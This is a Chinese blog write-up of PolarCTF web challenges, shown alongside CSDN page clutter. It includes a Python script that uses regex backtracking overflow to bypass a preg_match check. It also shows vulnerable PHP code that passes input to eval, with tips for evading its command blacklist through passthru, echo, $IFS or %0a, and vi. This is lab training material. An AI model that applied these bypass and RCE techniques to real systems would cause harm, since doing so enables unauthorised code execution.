[DS]Polar靶场web(一)

已于 2024-03-25 08:28:32 修改
阅读量525 收藏 8
点赞数 4
文章标签: 学习 安全
于 2024-03-24 23:27:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74057302/article/details/136982608
版权
本文描述了一个技术挑战,涉及如何通过绕过系统函数过滤和使用特定技巧(如swp文件、回溯和JSFuck编码)来获取flag。作者分享了如何利用POST数据和PHP函数实现远程代码执行(RCE)并找到隐藏的flag。
摘要由CSDN通过智能技术生成

静以养心,宽以养气。

跟着Dream ZHO大神学专升安的一天

swp

直接dirb扫出.index.php.swp的目录

function jiuzhe($xdmtql){
    return preg_match('/sys.*nb/is',$xdmtql);//如果包含以 "sys" 开始,后跟任意字符直到 "nb" 的字符串,返回true
}

$xdmtql=@$_POST['xdmtql'];
if(!is_array($xdmtql)){//非数组
    if(!jiuzhe($xdmtql)){
        if(strpos($xdmtql,'sys nb')!==false){如果$xdmtql匹配到sys nb则输出flag{*******}
            echo 'flag{*******}';
        }else{
            echo 'true .swp file?';
        }
    }else{
        echo 'nijilenijile';
    }
}

 我们要想得到flag要满足:$xdmtql非数组,不匹配/sys.*nb/is,但是要匹配strpos($xdmtql,'sys nb')为true

这样我们可以用回溯绕过,pre_match函数处理的字符长度有限,如果超过这个长度就会返回false也就是没有匹配到。直接上脚本。

import requests
request=requests.post('http://24aac5d4-fc13-414a-8c21-62130c090777.www.polarctf.com:8090/',data={'xdmtql':'sys nb'+'-'*1000000})
print(request.text)

简单rce

<?php
/*

PolarD&N CTF

*/
highlight_file(__FILE__);
function no($txt){
    if(!preg_match("/cat|more|less|head|tac|tail|nl|od|vim|uniq|system|proc_open|shell_exec|popen| /i", $txt)){
    return $txt;}
   else{
die("what's up");}}
$yyds=($_POST['yyds']);
if(isset($_GET['sys'])&&$yyds=='666'){
  eval(no($_GET['sys']));
  }
  else
    {echo "nonono";
}
?> nonono

这题过滤了cat|more|less|head|tac|tail|nl|od|vim|uniq|system|proc_open|shell_exec|popen这么多函数,但是他过滤,关我什么事,我们仍可以用echo和passthru来查看目录,空格用%0a或{$IFS}代替,读取文件用vi。

下面直接开打!!!

蜜雪冰城吉警店

只要把任意id改为9即可

召唤神龙

直接看源码,发现js有jsfuck编码

在浏览器解密一下就出来了

seek flag

查看源码一眼robots.txt

发现了flag3,那我们再找另两部分

抓个包看看

发现flag2,将id设为1发现flag1

AZ_aa
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
[DS]Polar靶场web(一),来来来
m0_60635035的博客
04-08 741
else{我们要想得到flag要满足:KaTeX parse error: Undefined control sequence: \* at position 19: …tql非数组,不匹配/sys.\̲*̲nb/is,但是要匹配strp…xdmtql,‘sys nb’)为true这样我们可以用回溯绕过,pre_match函数处理的字符长度有限,如果超过这个长度就会返回false也就是没有匹配到。直接上脚本。
polarDB for Pgsql
08-26
阿里云的rpm安装包
[DS]Polar靶场web(二)
m0_74057302的博客
03-25 691
人总是对未知的事情充满恐惧,当你开始行动时,未知的恐惧就会迎刃而解。
Polar靶场WEB签到】
samRsa
12-05 369
2、上面base64解码出 ./data/index.php,进这个页面。不要问我为啥在这个目录,名字叫flag.php,别问题,问了我也不会说。解答:1、进入index页面,说让你加弟弟,你就屈服呗。
polarctf靶场web】签到题、简单 rce、蜜雪冰城吉警店、到底给不给flag呢
m0_73981089的博客
04-24 1155
此时注意GET数组的值,$ _GET["flag"]=Polar​,而经过$_POST​的变量覆盖,​$ _GET =array(1) { ["flag"]=> string(4) "flag" }<span> </span>​,故而最开始传GET参数时?并且value不能等于flag,若想输出执行到最后输出flag,那么变量覆盖时候不能将$flag 的值等于除flag 外的任意值,也就是说在foreach内的变量覆盖过程,需要实现。这样被解析之后,就是c=flag&flag=c。方法二:字符串转义绕过;
PolarCTF2024冬季个人挑战赛wp含web、misc、crypto_polar冬季赛
Python毕设源码程序王哥
04-12 713
乱码,火狐浏览器ALT->查看->修复乱码,得到一个被加密的文件名,base64解密得到index.phps参数sys不能等于xxs,但是经过url编码的sys可以等于xxs,先让浏览器进行转码,%25->%,%78->x,就能实现(emmm,附件的内容其实就是乱码修复后的)
polar靶场通关笔记
weixin_43296565的博客
06-06 5144
这里是关于自己打polar靶场的小笔记
polardb-jdbc18.zip
10-20
PolarDB-JDBC18是一款专为阿里云PolarDB数据库设计的Java数据库连接驱动,它基于JDBC(Java Database Connectivity)接口,为开发者提供了一种在Java应用程序中访问和操作PolarDB数据库的标准方式。本文将详细介绍...
polar编码实现逻辑
最新发布
05-23
polar编码实现逻辑
pola.rar_polar
09-19
标题中的“pola.rar_polar”暗示了这是一个与Polar相关的RAR压缩文件,可能是包含了一些示例代码或者项目实例。Polar通常指的是PolarDB,阿里巴巴的一款分布式数据库系统,它以其高性能、高可扩展性和低成本而闻名。...
Polar编码matlab程序
03-26
极化码(Polar Codes)是一种新兴的错误纠正编码技术,由土耳其科学家Erdal Arıkan在2009年提出。这种编码方法基于信道极化理论,能够达到香农理论中的信道容量,即在无限长的码块长度下实现零误码率传输。在实际...
CODE_matlab_polarcode_code_polar_
10-04
标题中的"CODE_matlab_polarcode_code_polar_"暗示了这是一个关于使用MATLAB实现极化码(Polar Code)的项目。极化码是一种新兴的纠错编码技术,由Erdal Arıkan在2009年提出,主要用于提高信道传输的可靠性。这种...
polar码译码matlab程序
10-19
码长2014的polar码matlab译码程序,采用SCL算法
polarization_polar_
09-30
在通信领域,极化码(Polar码)是一种先进的编码技术,由土耳其科学家Erdal Arikan于2009年提出。它基于信道极化的概念,能够实现理论上的香农容量,即在给定信道条件下,最大可能的数据传输速率。在本项目中,我们...
PolarD&N(简单rce)
果粒程
04-16 516
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-i7IKevHK-1681605902192)(D:\网安笔记\图片\image-20230415190913908.png)]
[DS]Polar靶场web(一)(1),腾讯网络安全开发面试经验
weixin_58163367的博客
04-15 266
【代码】[DS]Polar靶场web(一)(1),腾讯网络安全开发面试经验。
Polar靶场web(三)
m0_74057302的博客
03-29 487
期待得到某一件事物的时候,才是最美好的。
polar transform
11-11
Polar Transform是一种图像处理技术,它可以将直角坐标系下的图像转换为极坐标系下的图像。在极坐标系下,图像的中心点被定义为原点,图像的每个像素点被表示为它们的极径和极角。这种转换可以用于减小两种视角图像的域差异,从而提高图像检索的性能。在极坐标系下,图像的旋转和缩放变得更加容易,因此Polar Transform也被广泛应用于图像处理和计算机视觉领域。 下面是一个使用OpenCV库实现Polar Transform的Python代码示例: ```python import cv2 import numpy as np # 读取图像 img = cv2.imread('image.jpg') # 将图像转换为灰度图像 gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # 计算图像中心点 height, width = gray.shape center = (width // 2, height // 2) # 计算图像的最大半径 radius = int(np.sqrt((height / 2) ** 2 + (width / 2) ** 2)) # 进行Polar Transform polar = cv2.linearPolar(gray, center, radius, cv2.WARP_FILL_OUTLIERS) # 显示原始图像和Polar Transform后的图像 cv2.imshow('Original Image', img) cv2.imshow('Polar Transform', polar) cv2.waitKey(0) cv2.destroyAllWindows() ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值